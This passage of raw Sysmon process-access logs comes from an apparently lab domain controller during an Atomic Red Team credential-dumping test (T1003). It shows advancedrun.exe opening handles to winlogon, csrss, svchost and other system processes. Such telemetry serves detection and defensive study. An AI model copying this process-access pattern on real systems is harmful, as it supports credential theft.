ERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
